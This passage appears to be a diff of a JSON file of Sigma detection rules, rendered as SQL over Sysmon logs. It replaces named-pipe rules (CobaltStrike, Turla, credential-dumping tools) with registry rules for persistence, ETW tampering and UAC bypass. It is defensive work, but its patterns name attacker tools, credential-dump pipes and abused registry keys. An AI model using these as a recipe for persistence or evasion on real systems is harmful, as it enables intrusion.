'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND Details LIKE '%}\\\\python-%' 
ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND Details = 'ctfmon.exe /n') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (Details LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((Image LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR Image LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND Details LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" ], - "filename": "pipe_created_psexec_pipes_artifacts.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential Persistence Via Mpnotify", + "id": 
"92772523-d9c1-4c93-9547-b0ca500baba3", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE 
'\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", - "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "ETW Logging Disabled For SCM", + "id": "4f281b83-0200-4b34-bf35-d24687ea57c2", + "status": "experimental", + "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Tracing\\\\SCM\\\\Regular\\\\TracingDisabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_services_etw_tamper.yml" }, { - "title": 
"Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", + "title": "Potential Persistence Via Event Viewer Events.asp", + "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", + "status": "test", + "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND Details LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND Details LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (Details = 
'http://go.microsoft.com/fwlink/events.asp') OR (Details = '(Empty)')))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_persistence_event_viewer_events_asp.yml" }, { - "title": "PowerShell Execution Via Named Pipe", - "id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", - "status": "test", - "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Modification of Explorer Hidden Keys", + "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "status": "experimental", + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_powershell_execution_pipe.yml" + "filename": "registry_set_hide_file.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the 
AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "ETW Logging Disabled For rpcrt4.dll", + "id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "status": "experimental", + "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\Rpc\\\\ExtErrorInformation' ESCAPE '\\' AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000002)'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_rpcrt4_etw_tamper.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "Service Binary in Uncommon Folder", + "id": "277dc340-0540-42e7-8efb-5ff460045e07", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool 
EfsPotato", + "description": "Detect the creation of a service with a service binary located in a uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_creation_service_uncommon_folder.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": 
"Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "Persistence Via New SIP Provider", + "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1553.003" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Legitimate SIP being registered by the OS or different software." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' 
ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((Details IN ('WINTRUST.DLL', 'mso.dll')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_sip_persistence.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Keyboard Layout Load", + "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "status": "test", + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (Details LIKE '%00000429%' ESCAPE '\\' OR Details LIKE '%00050429%' ESCAPE '\\' OR Details LIKE '%0000042a%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_susp_keyboard_layout_load.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", - "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "status": "test", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ 
- "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", - "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1106" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": 
"registry_set_mal_blue_mockingbird.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "status": "experimental", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP 